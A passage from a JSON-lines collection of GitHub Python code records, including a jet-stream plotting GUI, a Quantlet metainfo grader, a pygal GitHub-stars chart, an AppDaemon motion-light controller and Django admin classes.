fig.add_axes([l,b-0.075,w,0.02])\n\n# do this now so that we can get adjusted ax get_position\nplt.draw()\nplt.pause(0.01)\n\n# vertical section\nl,b,w,h = axs[0].get_position().bounds\naxs[2] = fig.add_axes((l+w+0.01,b,.2,h))\n\n# some customizations (called on the axes of the section)\ntitle2_str = 'Section at lon=%.1f' % 0\nt2 = axs[2].set_title(title2_str)\naxs[2].set_ylim(BB_fig['lat'][0],BB_fig['lat'][1])\n# ax.set_xlabel('Level (hPa)')\n# ax.invert_xaxis()\naxs[2].set_xlabel('Altitude (km)')\naxs[2].yaxis.tick_right()\naxs[2].yaxis.set_label_position('right')\naxs[2].set_ylabel('Latitude (deg)')\n\n# blank data for initiating contours\nblank = np.array(np.ones((2,2), dtype=float))\n\n# plot filled contour for wmap(lon,lat)\ncflines = np.arange(20,100,10)\ncmap = plt.cm.get_cmap('BuPu')\ncf1 = axs[0].contourf(blank, blank, blank, cflines, cmap=cmap)\n# contour lines for hmap(lon,lat) and pmap(lon,lat)\ncslines1 = np.arange(7000, 11000, 100)\ncs11 = axs[0].contour(blank, blank, blank, cslines1, colors='k', linewidths=1.0, linestyles='solid')\ncs12 = axs[0].contour(blank, blank, blank, np.arange(870,1013,2),colors='gray', linewidths=1.0, linestyles='dashed')\ncs13 = axs[0].contour(blank, blank, blank, np.arange(1014,1085,2), colors='gray', linewidths=1.0, linestyles='solid')\n\n# plot filled contour lines for wsec(level, lat)\ncf2 = axs[2].contourf(blank, blank, blank, cflines, cmap=cmap)\n# plot line of hgt of 300hPa surface at lon\nl3, = axs[2].plot([], [], 'k-', linewidth=1.0)\ncslines2 = np.arange(100, 600, 100)\ncs2 = axs[2].contour(blank, blank, blank, cslines2, colors='b', linewidths=1.0, linestyles='solid')\n\n# eventually will try determine polar jet stream (pjs) and subtropical js (stjs)\n# plot jet stream locations on map\njsmap, = axs[0].plot([],[], 'ro', markersize=6)\n# and on vertical section\njsvec, = axs[2].plot([],[], 'ro', markersize=6)\n\ndef update_section_plot(val):\n # when lon slider changes\n global js,jsvec,l3,cf1,cf2,cs11,cs12,cs13,cs2 \n dtidx = int(sdt.val)\n lonidx = int(slon.val)\n\n # need to subset js for this longitude\n thislon = np.where( d['lon'][js[:,JSLON]] == d['lon'][lonidx] )\n which_lats = js[thislon,JSLAT]\n which_lvls = js[thislon,JSLVL]\n yy = d['lat'][which_lats]\n jsvec.set_ydata(yy)\n\n # determine ht at these lats for jet stream locatios\n ht = metpy.calc.add_pressure_to_height(d['ht_std'][which_lvls], d['pdiff'][dtidx,which_lats,lonidx].squeeze())\n xx = ht.m\n jsvec.set_xdata(xx)\n\n # all standard press hts mesh (dot.m is metpy way of getting array)\n vlats, lvls = np.meshgrid(d['lat'], d['level'])\n vlats, hts_std = np.meshgrid(d['lat'], d['ht_std'].m)\n # add units for metpy.calc\n hts_std = hts_std * d['ht_std'].units\n # compute new hts based on adding pdiff to standard heights\n hts = metpy.calc.add_pressure_to_height(hts_std, d['pdiff'][dtidx,:,lonidx].squeeze())\n wsec = d['wspd'][dtidx,:,:,lonidx].squeeze()\n # move the lon line and change title\n l1.set_xdata([ d['lon'][lonidx], d['lon'][lonidx]])\n title2_str = 'Section at lon=%.1f' % d['lon'][lonidx]\n t2.set_text(title2_str)\n # remove previous filled contours\n for tp in cf2.collections:\n tp.remove()\n # plot new contours\n # cf2 = ax.contourf(lvls, vlats, wsec, cflines, cmap=cmap)\n cf2 = axs[2].contourf(hts, vlats, wsec, cflines, cmap=cmap)\n # cf2 = axs[2].contour(hts, vlats, wsec, cflines, cmap=cmap)\n\n # pick data of 300hPa surface from hgt\n (lev300,) = (d['level']==300).nonzero()\n hsec = d['hgt'][dtidx,lev300,:,lonidx].squeeze()\n # \n l3.set_xdata(hsec)\n l3.set_ydata(d['lat'])\n \n hsec = d['hgt'][dtidx,:,:,lonidx].squeeze()\n # remove previous contours and labels\n for tp in cs2.collections:\n tp.remove()\n for lb in cs2.clabel():\n lb.remove()\n # plot new contours, pressure levels\n # cs2 = ax.contour(lvls, vlats, lvls, cslines, colors='k', linewidths=1.0, linestyles='solid')\n # contour lines for hsec is altitude (height) of constant pressure surface (level)\n cs2 = axs[2].contour(hsec, vlats, lvls, cslines2, colors='b', linewidths=1.0, linestyles='solid')\n cs2_lab = axs[2].clabel(cs2, fontsize=8, inline=1, inline_spacing=10, fmt='%i',\n rightside_up=False, use_clabeltext=True) \n\n plt.draw()\n\ndef update_both_plot(val):\n # when dt slider changes\n global js,jsmap,l3,cf1,cf2,cs11,cs12,cs13,cs2\n dtidx = int(sdt.val)\n lonidx = int(slon.val)\n\n # find jet stream locations each time step\n js = find_jets(d,dtidx,lm)\n jsmap.set_ydata(d['lat'][js[:,JSLAT]])\n jsmap.set_xdata(d['lon'][js[:,JSLON]])\n \n dt_str = d['dt'][dtidx].strftime(\"%Y_%m_%d_%H%M\")\n t1.set_text(dt_str)\n lons, lats = np.meshgrid(d['lon'], d['lat'])\n # avg wspd between 100 and 400 hPa levels \n (lev14,) = ((d['level']>=100) & (d['level']<=400)).nonzero()\n wmap = np.mean(d['wspd'][dtidx,lev14,:,:], axis=0)\n # pick 300 hPa level of hgt\n (lev300,) = (d['level']==300).nonzero()\n hmap = d['hgt'][dtidx,lev300,:,:].squeeze()\n pmap = d['msl'][dtidx,:,:].squeeze()\n # remove previous all previous contours and labels\n c = cf1.collections\n c.extend(cs11.collections)\n c.extend(cs12.collections)\n c.extend(cs13.collections)\n for tp in c:\n tp.remove()\n l = cf1.clabel()\n l.extend(cs11.clabel())\n l.extend(cs12.clabel())\n l.extend(cs13.clabel())\n for lb in l:\n lb.remove()\n # plot filled contour for wmap(lon,lat)\n cf1 = axs[0].contourf(lons, lats, wmap, cflines, cmap=cmap)\n # contour lines for hmap(lon,lat) and pmap(lon,lat)\n cs11 = axs[0].contour(lons, lats, hmap, cslines1, colors='k', linewidths=1.0, linestyles='solid')\n cs11_lab = axs[0].clabel(cs11, fontsize=8, inline=1, inline_spacing=10, fmt='%i',\n rightside_up=True, use_clabeltext=True)\n # contour lines for pmap(lon,lat) (low pmap<1013 dashed) (high pmap>1013 solid)\n # ever recorded lowest 870 hPa (typhoon), highest 1085 hPa\n cs12 = axs[0].contour(lons, lats, pmap, np.arange(870,1013,2),colors='gray', linewidths=1.0, linestyles='dashed')\n cs12_lab = axs[0].clabel(cs12, fontsize=8, inline=1, inline_spacing=10, fmt='%i',\n rightside_up=True, use_clabeltext=True)\n cs13 = axs[0].contour(lons, lats, pmap, np.arange(1014,1085,2), colors='gray', linewidths=1.0, linestyles='solid')\n cs13_lab = axs[0].clabel(cs13, fontsize=8, inline=1, inline_spacing=10, fmt='%i',\n rightside_up=True, use_clabeltext=True)\n # plt.draw()\n update_section_plot(val)\n\ndef prev_lon(val):\n lonidx = int(slon.val)\n slon.set_val(lonidx-1)\n\ndef next_lon(val):\n lonidx = int(slon.val)\n slon.set_val(lonidx+1)\n\ndef prev_dt(val):\n dtidx = int(sdt.val)\n sdt.set_val(dtidx-1)\n\ndef next_dt(val):\n dtidx = int(sdt.val)\n sdt.set_val(dtidx+1)\n\ndef local_max_num_peaks(val):\n global lm\n lm['num_peaks']=int(eval(val))\n update_both_plot(val)\n\ndef local_max_min_distance(val):\n global lm\n lm['min_distance']=int(eval(val))\n update_both_plot(val)\n\ndef local_max_exclude_border(val):\n global lm\n lm['exclude_border']=int(eval(val))\n update_both_plot(val)\n\ndef local_max_threshold_abs(val):\n global lm\n lm['threshold_abs']=float(eval(val))\n update_both_plot(val)\n\ndef toggle_limitation(val):\n global lm, cjs1\n lm['peaks_inside_toggle']=not lm['peaks_inside_toggle']\n if lm['peaks_inside_toggle']:\n cjs1.label.set_text('Limitation\\nON')\n cjs1.ax.set_facecolor('green')\n else:\n cjs1.label.set_text('Limitation\\nOFF')\n cjs1.ax.set_facecolor('red')\n update_both_plot(val)\n \ndef toggle_jet_stream(val):\n global jsmap, jsvec, cjs2\n jsmap.set_visible(not jsmap.get_visible())\n jsvec.set_visible(not jsvec.get_visible())\n if jsmap.get_visible():\n cjs2.label.set_text('Jet Stream\\nON')\n cjs2.ax.set_facecolor('green')\n else:\n cjs2.label.set_text('Jet Stream\\nOFF')\n cjs2.ax.set_facecolor('red')\n plt.draw()\n\n# outer grid to frame inner grid of gui, \n# use the object handle of figure (fig) and method add_gridspec\nogs = fig.add_gridspec(5,4, left=0.05, right=0.95, top=0.95, bottom=0.05)\n# otherwise this direct call in jupyter-notebooks put the grid and widgets in new figure\n# ogs = gs.GridSpec(4,3, left=0.1, right=0.95, top=0.95, bottom=0.05)\n\n# use top row of ogs for inner grids\n# ogs[0,0] for peak_local_max inputs\n# ogs[0,1] \n# ogs[0,2] for lon and dt sliders\n# ogs[0,3] for next and prev button sets\n\nigs = gs.GridSpecFromSubplotSpec(4,2,subplot_spec=ogs[0,0], hspace=0.1)\n# local_peak_max input parameters\n# num_peaks\ntext_np = TextBox(fig.add_subplot(igs[0,1], title='Local Maxima Detection'), 'num_peaks', initial=str(lm['num_peaks']))\ntext_np.on_submit(local_max_num_peaks)\n# min_distance (and dilation of max_filter)\ntext_md = TextBox(fig.add_subplot(igs[1,1]), 'min_distance', initial=str(lm['min_distance']))\ntext_md.on_submit(local_max_min_distance)\n# exclude_border \ntext_exb = TextBox(fig.add_subplot(igs[2,1]), 'exclude_border', initial=str(lm['exclude_border']))\ntext_exb.on_submit(local_max_exclude_border)\n# threshold_abs\ntext_thresh = TextBox(fig.add_subplot(igs[3,1]), 'threshold (m/sec)', initial=str(lm['threshold_abs']))\ntext_thresh.on_submit(local_max_threshold_abs)\n\nigs = gs.GridSpecFromSubplotSpec(4,2,subplot_spec=ogs[0,1], hspace=0.1)\n# further JS limitation hide/show\ncjs1 = Button(fig.add_subplot(igs[2:,0]), label='Limitation\\nON', color='green', hovercolor='green')\ncjs1.on_clicked(toggle_limitation)\n# describe limitation in text\n# JS hide/show\naxbtn2 = fig.add_subplot(igs[0:2,0])\ncjs2 = Button(fig.add_subplot(igs[0:2,0]), \n label='Jet Stream\\nON', color='green', hovercolor='green')\ncjs2.on_clicked(toggle_jet_stream)\n\nigs = gs.GridSpecFromSubplotSpec(4,1,subplot_spec=ogs[0,2], hspace=0.2)\n# Longitude slider\n# use the object handle of figure (fig) and method add_subplot to add\naxlon = fig.add_subplot(igs[0])\nslon = Slider(axlon, 'Long', 0, 100, valinit=0, valfmt='%d')\nslon.on_changed(update_section_plot)\n# Date slider\naxdt = fig.add_subplot(igs[1])\nsdt = Slider(axdt, 'Date', 0, 31*4, valinit=0, valfmt='%d')\nsdt.on_changed(update_both_plot)\n\nigs = gs.GridSpecFromSubplotSpec(4,4,subplot_spec=ogs[0,3], hspace=0.2)\n# Longitude prev button\naxlonprev = fig.add_subplot(igs[0,0])\nblonprev = Button(axlonprev, '<')\nblonprev.on_clicked(prev_lon)\n# Longitude next button\naxlonnext = fig.add_subplot(igs[0,1])\nblonnext = Button(axlonnext, '>')\nblonnext.on_clicked(next_lon)\n\n# Date prev button\naxdtprev = fig.add_subplot(igs[1,0])\nbdtprev = Button(axdtprev, '<')\nbdtprev.on_clicked(prev_dt)\n# Date next button\naxdtnext = fig.add_subplot(igs[1,1])\nbdtnext = Button(axdtnext, '>')\nbdtnext.on_clicked(next_dt)\n\n\ndef init_plot():\n \"\"\" initialize plots, finish setting up, and set slider limits\n \"\"\"\n global js,jsmap,jsvec,cf1,cf2,cs11,cs12,cs13,cs2\n dtidx = 0\n lonidx = 65 # start lon on 75W\n\n dt_str = d['dt'][dtidx].strftime(\"%Y_%m_%d_%H%M\")\n t1.set_text(dt_str)\n\n vsec_str = 'Section at lon=%.1f' % d['lon'][lonidx]\n t2.set_text(vsec_str)\n\n slon.valinit = lonidx\n slon.valmin = 0\n slon.valmax = len(d['lon'])-1\n slon.valstep = 1\n\n sdt.valinit = dtidx\n sdt.valmin = 0\n sdt.valmax = len(d['dt'])-1\n\n update_both_plot(0)\n\n # plot map adn set up colorbar\n # draw colorbar\n cb = fig.colorbar(cf1, cax=axs[1], orientation='horizontal') \n cb.set_label('Wind Speed (m/sec)')\n\n\nif len(sys.argv)==2:\n yyyy_mm = sys.argv[1]\nelse:\n yyyy_mm = '2018_01'\n\nBB['dt'] = find_months(yyyy_mm)\nBB_fig['dt'] = find_months(yyyy_mm)\n\n# input path of netcdf files\n# local data\n# indir = os.path.join('/data', 'era5', 'test')\n# d = get_data(indir, BB)\n\n# use data on dap server\n# dapdir = 'http://whewell.marine.unc.edu/dods/era5/test' # 10/60 N\ndapdir = 'http://whewell.marine.unc.edu/dods/era5' # 0/80 N\nd = get_data(dapdir, BB)\n\ninit_plot()\nplt.draw()\n","repo_name":"neaptide/jsviz","sub_path":"jsviz.py","file_name":"jsviz.py","file_ext":"py","file_size_in_byte":14953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"17361700083","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 21 12:50:32 2018\n\n@author: sterlinm.hub\n\"\"\"\n\n\nimport itertools, yaml, datetime, re\nimport numpy as np\nfrom nltk.corpus import stopwords\nclass METAFILE:\n \"\"\" This class contains the matainfo files informations. \"\"\"\n keyReplacement = {\n 'author': ['authors'],\n 'input': ['inputs'],\n 'datafiles': ['datafile'],\n 'name of quantlet': ['iname of quantlet'],\n 'subfunctions' : ['subfunction'],\n 'submited' : ['submitte','submitted by']\n }\n keyReplacementValues = list(itertools.chain.from_iterable(keyReplacement.values()))\n def __init__(self, file, repo, content, commits):\n \"\"\"Initializing function for the class METAFILE.\n file -- github.ContentFile.ContentFile of the metainfo file\n repo -- the repository in which the metainfo file is\n \"\"\"\n self.metainfo_undebugged = file.decoded_content.decode()\n self.repo_name = repo.name\n self.path_in_repo = file.path\n self.path_of_metainfo = '/'.join([self.repo_name,file.path])\n self.directory = '/'.join([self.repo_name,file.path.replace(file.name,'')])\n if self.directory.endswith('/'):\n self.directory = self.directory[:-1]\n self.is_debuggable = False\n self.last_modified = file.last_modified\n self.commit_first = {k:v for k,v in commits[1].raw_data.items() if k in ['sha','commit']}\n self.commit_last = {k: v for k, v in commits[0].raw_data.items() if k in ['sha', 'commit']}\n self.sha = file.sha\n self.size = file.size\n try: #FIXME: no general error exceptions\n try:\n self.metainfo_debugged = METAFILE.yaml_debugger(self.metainfo_undebugged)\n except yaml.scanner.ScannerError as e:\n self.metainfo_debugged = METAFILE.yaml_debugger(METAFILE.pre_clean(self.metainfo_undebugged))\n self.is_debuggable = True\n \n self.metainfo_debugged = {k.lower(): v for k, v in self.metainfo_debugged.items()}\n self.metainfo_debugged = METAFILE.clean_keys(self.metainfo_debugged)\n self.create_keyword_list()\n self.list_to_string()\n file_type = [c.name.split('.')[-1].lower() for c in content if c.name.split('.')[0].lower() == self.metainfo_debugged['name of quantlet'].lower()]\n file_type = [i for i in file_type if i in ['m','r','py','c','sh','ipynb','sas']]\n if file_type: \n self.software = ','.join(file_type)\n else:\n self.software = None\n self.__grading(content)\n except:\n pass\n# [i for i in file_type if i not in ['png','jpg','jpeg','pdf']]\n \n def pre_clean(c):\n \"\"\"Correcting non YAML debuggable files which contain ':' at the wrong location. \"\"\"\n csplit = c.split(':')\n _tmp = ['\\n\\n' in b or '\\n' in b for b in csplit]\n _tmp[0] = True\n _tmp[-1] = True\n if all(_tmp):\n return c\n idx = np.argwhere([not b for b in _tmp]).flatten()\n idx[::-1].sort()\n for i in idx:\n csplit[i] += ' -'+csplit[i+1]\n csplit = np.delete(csplit,i+1)\n return ':'.join(csplit)\n def yaml_debugger(x):\n \"\"\" YAML debugging the string, correcting for tabs \"\"\"\n x = x.replace('\\t', ' ')\n x = x.replace('\\r', ' ')\n res = yaml.load(x, Loader = yaml.SafeLoader)\n return res\n def clean_keys(d):\n \"\"\" Renames keys of the dictary that were used falsely\"\"\"\n # import copy; d = copy.deepcopy(tmp)\n _contains_brackets = ['[' in i for i in list(d.keys())]\n if any(_contains_brackets):\n ret = {}\n for k,v in d.items():\n if '[' not in k:\n ret.update({k:v})\n for k,v in d.items():# [{k:v} for k,v in d.items() if '[' in k]:\n if '[' in k:\n _key = (k.split('[')[0]).rstrip()\n if _key in ret.keys():\n if isinstance(v,list):\n if isinstance(ret[_key],str):\n v = v.split(', ')\n ret[_key].extend(v)\n elif isinstance(v,str) and isinstance(ret[_key],list):\n ret[_key].extend(v.split(', '))\n elif isinstance(v,str) and isinstance(ret[_key],str):\n ret[_key] += ', '+ v\n else:\n ret.update({_key: v})\n d = ret\n \n # TODO check with string distance which field is meant and combine\n if True:\n _d = np.concatenate(list(METAFILE.keyReplacement.values()))\n _b = np.isin(_d,np.array(list(d.keys())))\n tmp = {}\n if any(_b):\n for k,v in METAFILE.keyReplacement.items():\n for v2 in [v2 for v2 in v if v2 in _d[_b]]:\n tmp.update({k: v2})\n for k,v in tmp.items():\n d[k] = d.pop(v)\n return d\n def list_to_string(self):\n \"\"\" parsing lists to string, since yaml can contain list \"\"\"\n if not self.is_debuggable:\n return\n for k,v in self.metainfo_debugged.items():\n if isinstance(v,list) and all([isinstance(i,str) for i in v]):\n sep = ', '\n if k == 'description':\n sep = '.\\n'\n elif k == 'author':\n if [i for i in self.metainfo_debugged[k] if ',' in i]:\n self.metainfo_debugged[k] = [' '.join(i.split(',',1)[::-1]) for i in self.metainfo_debugged[k]]\n self.metainfo_debugged[k] = sep.join(v)\n def create_keyword_list(self):\n \"\"\" Saves the keywords as a list \"\"\"\n if isinstance(self.metainfo_debugged['keywords'],list):\n self.keyword_list = self.metainfo_debugged['keywords']\n elif self.metainfo_debugged['keywords'] is None:\n self.keyword_list = []\n else:\n self.keyword_list = self.metainfo_debugged['keywords'].split(',')\n self.keyword_list = [i.lstrip(' ') for i in self.keyword_list]\n self.keyword_list.sort()\n \n def __grading(self,content):\n self.grading_output = {\n 'q_quali': ['A'], # quality of metainfo file\n 'keywords':None, # number of keywords\n 'description_length':None, # number of words in discription\n 'description_length_wo_stopwords':None, # number of words without stopwords in discription\n 'comment':[], # indication why grade worse than A was given\n 'pictures':None, # number of pictures in \n 'submitted_year':None # submission year\n }\n \n if self.is_debuggable:\n _fields = ['author', 'description','keywords','name of quantlet', 'published in']\n _missing_fields = [c for c in _fields if c not in self.metainfo_debugged.keys()]\n if len(_missing_fields)>0:\n _msg = ', '.join(_missing_fields)\n if len(_missing_fields)>1:\n _msg += ' is missing'\n else:\n _msg += ' are missing'\n self.grading_output['comment'].append(_msg)\n self.grading_output['q_quali'].append('D')\n try:\n self.grading_output['q_name'] = self.metainfo_debugged['name of quantlet']\n self.grading_output['keywords'] = len(self.keyword_list)\n self.grading_output['description_length'] = len(self.metainfo_debugged['description'].split())\n stop_words = set(stopwords.words('english'))\n self.grading_output['description_length_wo_stopwords'] = len([word for word in self.metainfo_debugged['description'].split() if word not in stop_words])\n \n \n if 'submitted' in self.metainfo_debugged.keys() and self.metainfo_debugged['submitted'] is not None:\n try:\n submission_year = re.findall(r\"(\\d{4})\", self.metainfo_debugged['submitted'])\n if submission_year:\n self.grading_output['submitted_year'] = min(submission_year)\n self.grading_output['submitted_year']\n except: \n pass\n \n self.grading_output['submitted_year'] = datetime.datetime.strptime(self.last_modified,'%a, %d %b %Y %H:%M:%S GMT').strftime('%Y')\n \n except:\n self.grading_output['q_quali'] = 'F'\n '! '.join(self.grading_output['comment'])\n return None\n if self.grading_output['keywords'] < 5:\n if self.grading_output['keywords'] > 0:\n self.grading_output['q_quali'].append('B')\n self.grading_output['comment'].append('less than 5 keywords')\n else:\n self.grading_output['q_quali'].append('C')\n self.grading_output['comment'].append('no keywords found')\n if self.grading_output['description_length'] < 10:\n if self.grading_output['description_length'] >0:\n self.grading_output['comment'].append('less than 10 words in description')\n self.grading_output['q_quali'].append('B')\n else:\n self.grading_output['comment'].append('no description')\n self.grading_output['q_quali'].append('C')\n content2 = [c.name.split('.') for c in content]\n if not any(['.'.join(c[:len(c)-1]).lower() == self.grading_output['q_name'].lower() for c in content2 if c[-1].lower() not in ['png','jpg','jpeg','pdf','md']]):\n self.grading_output['comment'].append('Q is not in folder or named differently')\n self.grading_output['q_quali'].append('D')\n else:\n self.grading_output['q_quali'] = 'F'\n self.grading_output['comment'] = 'YAML debug error'\n return None\n self.grading_output['pictures'] = sum([c.name.split('.')[-1].lower() in ['png','jpg','jpeg'] for c in content])\n pdfs = [c for c in content if 'pdf' == c.name.split('.')[-1].lower()]\n if len(pdfs)>0 and self.grading_output['pictures'] == 0:\n #_refs = [c.name.split('.')[0] for c in _contents if c.name.split('.')[1] in ['png','jpg','jpeg']]\n #_pdfs = [c for c in _pdfs if c.name.split('.')[0] in _refs]\n self.grading_output['comment'].append('only PDF picture in folder (?)')\n self.grading_output['q_quali'].append('B')\n self.grading_output['comment'] = '! '.join(self.grading_output['comment'])\n self.grading_output['q_quali'] = max(self.grading_output['q_quali'])\n self.grade = self.grading_output['q_quali']\n","repo_name":"QuantLetTeam/Quantlet_Evaluation","sub_path":"modules/METAFILE.py","file_name":"METAFILE.py","file_ext":"py","file_size_in_byte":11075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"14478114226","text":"#!/usr/bin/python\r\n# -*- coding:utf8 -*-\r\n\r\n\r\nimport pygal\r\nimport requests\r\nfrom pygal.style import LightColorizedStyle as LCS , LightenStyle as LS\r\n\r\ndef get_status_code():\r\n #调用API\r\n\r\n url = 'https://api.github.com/search/repositories?q=language:python&sort=stars'\r\n r = requests.get(url)\r\n return r.status_code\r\n\r\n #将API响应存储到变量中\r\n request = r.json()\r\n\r\n #探索仓库的有关信息\r\n repo_dicts = request['items']\r\n print(\"Number of items:\",len(repo_dicts))\r\n\r\n names,plot_dicts =[],[]\r\n for repo_dict in repo_dicts:\r\n names.append(repo_dict['name'])\r\n\r\n plot_dict = {\r\n 'value':repo_dict['stargazers_count'],\r\n 'label':str(repo_dict['description']),\r\n }\r\n\r\n plot_dicts.append(plot_dict)\r\n\r\n #可视化\r\n my_style = LS('#333366',base_style=LCS)\r\n\r\n my_config = pygal.Config()\r\n my_config.x_label_rotation = 45\r\n my_config.show_legend = False\r\n my_config.title_font_size = 24\r\n my_config.label_font_size = 14\r\n my_config.major_label_font_size = 18\r\n my_config.truncate_label = 15\r\n my_config.show_y_guides = False\r\n my_config.width = 1000\r\n\r\n chart = pygal.Bar(my_config,style=my_style)\r\n chart.title = 'Most-Started Python Projects on Github'\r\n chart.x_labels = names\r\n\r\n chart.add('',plot_dicts)\r\n chart.render_to_file('Python_repos.svg')\r\n\r\nget_status_code()","repo_name":"Flerken101/Python-Crash-Course","sub_path":"Chapter 17/python_repos.py","file_name":"python_repos.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"628867119","text":"import os\n\nROOT = \"/Data/Crawling\"\nos.makedirs(ROOT, exist_ok=True)\n\nimport hashlib\n\ndef convert_hash(file):\n if not isinstance(file, (bytes)):\n with open(file, 'rb') as f:\n file = f.read()\n md5 = hashlib.md5()\n md5.update(file)\n return md5.hexdigest()","repo_name":"jjerry-k/image_crawler","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"4196086877","text":"class Solution:\n def findLongestWord(self, s: str, d: List[str]) -> str:\n def is_sub(s1, s2):\n index = 0\n for c in s2:\n if index >= len(s1):\n break\n if c == s1[index]:\n index += 1\n return index >= len(s1)\n\n d.sort(key=lambda word: (-len(word), word))\n for word in d:\n if is_sub(word, s):\n return word\n return \"\"\n","repo_name":"sabercon/algorithm-python","sub_path":"501_600/524.py","file_name":"524.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8046340441","text":"import appdaemon.plugins.hass.hassapi as hass\nimport datetime\n\n#\n# Motion Control - Trigger actions based on motion sensors.\n#\n# Args:\n# manual_toggle - Input control used to override automatic controls\n# motion_sensors - The sensors that will be used to determine if entities should be automatically controlled\n# controlled_entities - The entities that will be automatically updated at provided times \n#\n\nclass MotionControl(hass.Hass):\n\tdef initialize(self):\n\t\tself.__manual_toggle = self.args[\"manual_toggle\"]\n\t\tself.__motion_sensors = self.args[\"motion_sensors\"]\n\t\tself.__entity_rulesets = self.args[\"entity_rulesets\"]\n\t\tself.__current_entity_ruleset = {}\n\n\t\t# Register Manual Toggle Handlers\n\t\tself.handle_manual_toggle = self.listen_state(self.__on_manual_toggle, self.__manual_toggle['entity'])\n\n\t\t# Register Sensor Handlers\n\t\tfor (sensor, sensor_details) in self.__motion_sensors.items():\n\t\t\tself.log(\"Registering Sensor: %s.\" % (sensor))\n\t\t\tself.handle_motion = self.listen_state(self.__on_motion_change, sensor, new = sensor_details['on_state'].casefold())\n\t\t\tself.handle_no_motion = self.listen_state(self.__on_motion_change, sensor, old = sensor_details['on_state'].casefold(), duration = sensor_details['duration'])\n\t\t\tsensor_details['on'] = (sensor_details['on_state'].casefold() == self.get_state(sensor))\n\t\t\tself.log(\"Current Sensor Values: %s\" % (self.__motion_sensors[sensor]))\n\n\t\t# Register Ruleset Time Handlers\n\t\tfor ruleset in self.__entity_rulesets:\n\t\t\ttime = self.parse_time(ruleset[\"end\"])\n\t\t\trun_time = datetime.time(time.hour, time.minute, time.second + 1)\n\t\t\tself.run_daily(self.__on_ruleset_change, run_time)\n\t\t\t\n\t\tself.update_entity_states()\n\n\tdef update_entity_states(self):\n\t\tself.__update_current_entity_ruleset()\n\t\tself.__trigger_lights()\n\n\tdef __update_current_entity_ruleset(self):\n\t\t# Determine if current ruleset is valid\n\t\tif(self.__time_in_range(self.__current_entity_ruleset) == False):\n\t\t\t# Update to latest ruleset \n\t\t\tfor ruleset in self.__entity_rulesets:\n\t\t\t\tif(self.__time_in_range(ruleset)):\n\t\t\t\t\tself.log(\"New ruleset applied. Start: %s End: %s\" % (ruleset['start'], ruleset['end']))\n\t\t\t\t\tself.__current_entity_ruleset = ruleset\n\t\t\t\t\tbreak\n\n\tdef __time_in_range(self, ruleset):\n\t\t# Ensure ruleset has been loaded and that it doesn't cover a full (full days rulesets always valid)\n\t\tif (ruleset == {}): return False\n\t\tif (ruleset['start'] == ruleset['end']): return True\n\t\tself.log(\"Ruleset Valid: Start: %s End: %s Valid: %s\" % (ruleset['start'], ruleset['end'], self.now_is_between(ruleset['start'], ruleset['end'])))\n\t\treturn self.now_is_between(ruleset['start'], ruleset['end']) \n\n\tdef __on_ruleset_change(self, kwargs):\n\t\tself.update_entity_states()\n\n\tdef __on_manual_toggle(self, entity, attribute, old, new, kwargs):\n\t\tself.log(\"Manual Toggle Triggers: entity:%s attribute:%s old:%s new:%s\" % (entity, attribute, old, new))\n\t\tself.__trigger_lights()\n\n\tdef __on_motion_change(self, entity, attribute, old, new, kwargs):\n\t\tself.log(\"Motion State Detected: entity:%s attribute:%s old:%s new:%s\" % (entity, attribute, old, new))\n\t\tself.__update_sensor_status(entity, new.casefold())\n\t\tself.__trigger_lights()\n\t\n\tdef __update_sensor_status(self, entity, value):\n\t\tself.__motion_sensors[entity]['on'] = (value == self.__motion_sensors[entity]['on_state'].casefold())\n\n\tdef __trigger_lights(self):\n\t\tauto_toggle = (self.get_state(self.__manual_toggle['entity']).casefold() == self.__manual_toggle['automatic_state'].casefold()) \n\t\tif(auto_toggle):\n\t\t\tif any(sensor['on'] == True for sensor in self.__motion_sensors.values()):\n\t\t\t\tself.log(\"Turning lights on\")\t\t\t\t\n\t\t\t\tself.__apply_entity_rules(self.__current_entity_ruleset, True)\n\t\t\telse:\n\t\t\t\tself.__apply_entity_rules(self.__current_entity_ruleset, False)\n\n\t\telse: self.log(\"Automatic control currently disabled.\") \n\n\tdef __apply_entity_rules(self, entity_ruleset, on):\n\t\tfor entity in entity_ruleset['entities']:\n\t\t\tself.log(entity)\n\t\t\tentity_on = on and entity['device_on'] \n\t\t\tself.log(entity_on)\n\t\t\tif(entity_on):\n\t\t\t\tself.log(\"Attempting request for: %s\" % (entity['entity']))\n\t\t\t\tif 'attributes' in entity: \n\t\t\t\t\tself.turn_on(entity['entity'], **entity['attributes'])\n\t\t\t\telse:\n\t\t\t\t\tself.turn_on(entity['entity'])\n\t\t\telse:\n\t\t\t\tself.turn_off(entity['entity'])","repo_name":"ericcolvinmorgan/AppDaemon","sub_path":"apps/motion_control.py","file_name":"motion_control.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17216292131","text":"from django.contrib import admin\nfrom django.utils.safestring import mark_safe\nfrom buzz.services import get_object_admin_link\nfrom .models import League, Season, Circuit, Group, Round\nfrom teams.models import Team\n\nclass LeagueAdmin(admin.ModelAdmin):\n \n def seasons(self):\n links = ''\n for obj in self.seasons.all():\n link = get_object_admin_link(obj, obj)\n links += f'{link},
        '\n \n links = links[0:-6]\n links = mark_safe(links)\n return links\n \n readonly_fields = (seasons,) \n\nclass SeasonAdmin(admin.ModelAdmin):\n\n list_display = (\n 'name',\n 'league',\n 'is_active',\n 'current_round',\n 'registration_open',\n 'rosters_open' \n ) \n \n def circuits(self):\n links = ''\n for obj in self.circuits.all():\n link = get_object_admin_link(obj, obj)\n links += f'{link},
        '\n \n links = links[0:-6]\n links = mark_safe(links)\n return links\n \n def rounds(self):\n links = ''\n\n for obj in self.rounds.all():\n link = get_object_admin_link(obj, obj)\n links += f'{link},
